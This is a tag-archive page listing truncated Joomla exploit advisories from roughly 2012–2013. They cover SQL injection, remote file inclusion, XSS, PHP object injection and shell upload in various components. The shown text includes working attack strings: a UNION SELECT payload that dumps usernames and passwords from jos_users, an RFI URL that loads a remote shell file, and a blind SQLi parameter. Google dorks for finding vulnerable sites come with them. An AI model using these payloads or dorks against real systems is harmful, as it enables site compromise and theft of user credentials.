Tags archives: joomla

 

0

Joomla Discussions SQL Injection

# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability # Author : Red Security TEAM # Date : 17/01/2012 # Risk : High # Software : http://extensions.joomla.org/extensions/communication/forum/13560 # Tested On : CentOS # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # http://server/index.php?option=com_discussions&view=thread&catid=[Correct [...]

 

0

Joomla Component com_s5clanroster Sql Injection Vulnerability

Joomla Component com_s5clanroster Sql Injection Vulnerability ==============================================================   #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Dork : inurl:”com_s5clanroster” .:. Script : http://www.newone.org/s5-clan-roster-shape5-extensions #################################################################### ===[ Exploit ]===   Sql Injection: ==============   www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]   www.site.com/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null’+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users– – ####################################################################   # BB720E99B11BBA96 1337day.com [2013-05-17] B1254A136A7E866F #

 

0

Joomla x-shop

Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability   ——————————————————————————– #Author: Crackers_Child     #cont@ct: crackers_child@sibersavascilar.com   ——————————————————————————–   Google Dorks : allinurl:”/com_x-shop/”   ————————- ——————————————————-   Download : http://mamboxchange.com/frs/?group_id=187&amp;release_id=1047   ——————————————————————————– Bug in admin.x-shop.php   <? include($mosConfig_absolute_path.’/administrator/components/com_x-shop/languages/’.$mosConfig_lang.’.php’); session_start();     ——————————————————————————–   Exploit:   http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?     ——————————————————————————–   greets:   All [...]

 

0

Joomla Jnews 8.0.1 Cross Site Scripting

# Exploit Title: Joomla com_jnews Open Flash-Chart XSS # Release Date: 14/05/2013 # Author: Deepankar Arora And Rafay Baloch # Blog: http://rafayhackingarticles.net # Vendor: www.joobi.co # Versions Affected: 8.0.1(latest) and earlier # Google Dork: inurl:com_jnews   Description:   The vulnerability with Open-Flash Chart is a known vulnerability, however it is integrated with com_jnews, The get-data [...]

 

0

Joomla Phocagallery 3.0.0 / 4.0.0 Cross Site Scripting

# Exploit Title: Joomla com_phocagallery Plupload Flash XSS # Release Date: 13/05/2013 # Author: Rafay Baloch And Deepankar Arora # Contact: http://rafayhackingarticles.net # Vendor: phoca.cz # Versions Affected: 3.0.0 – 4.0.0 # Google Dork: inurl:com_phocagallery   Description:   The vulnerability with plupload with a known vulnerability, however com_phocagallery uses it, The id parameter is not [...]

 

0

Joomla DJ Classifieds Extension 2.0 SQL Injection

# Exploit Title: Joomla – DJ Classifieds – Time-Based Blind SQL Injection # Google Dork: inurl:”index.php/dj-classifieds/” or inurl:”/dj-classifieds/” # Date: 4/5/2013 # Exploit Author: Napsterakos # Vendor Homepage: http://design-joomla.eu # Software Link: – # Version: 2.0 # Tested on: Linux     Link: http://server/joomla/index.php/dj-classifieds/   Exploit: http://server/joomla/index.php/dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=[SQLi]   # Exploit-DB Note: # dj-classifieds/ads/0/?limitstart=0&se=1&se_regs[0]=1 and 1=0 [...]

 

 

0

Joomla! 3.0.3 PHP Object Injection

—————————————————————— Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability ——————————————————————     [-] Software Link:   http://www.joomla.org/     [-] Affected Versions:   Version 3.0.3 and earlier 3.0.x versions. Version 2.5.9 and earlier 2.5.x versions.     [-] Vulnerability Description:   The vulnerable code is located in /plugins/system/remember/remember.php:   34. $hash = JApplication::getHash(‘JLOGIN_REMEMBER’); 35. 36. [...]

 

0

Joomla Janissaries Civicrm Shell Upload

<?php /* —————————————————————————- .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / [...]

 

0

Joomla Collector Shell Upload

# Exploit Title:Joomla com_collecter shell upload # Author: Red Dragon_al (Alb0zZ Team) # Home :HackForums.AL,alb0zz.in # Date :19/01/2013   # Category:: web apps # Google dork: [inurl:index.php?option=com_collector] # Tested on: Windows XP   # Download: http://www.steevo.fr/en/download # Home Page: http://www.steevo.fr/   ————————————— # ~ Expl0itation ~ # —————————————   1- Google dork: [inurl:index.php?option=com_collector]   2- [...]